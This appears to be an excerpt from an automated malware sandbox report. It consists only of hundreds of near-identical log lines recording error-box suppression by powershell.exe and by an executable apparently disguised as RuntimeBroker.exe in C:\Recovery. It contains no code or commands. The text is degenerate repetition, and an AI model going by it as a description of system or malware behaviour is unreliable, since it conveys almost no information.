                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
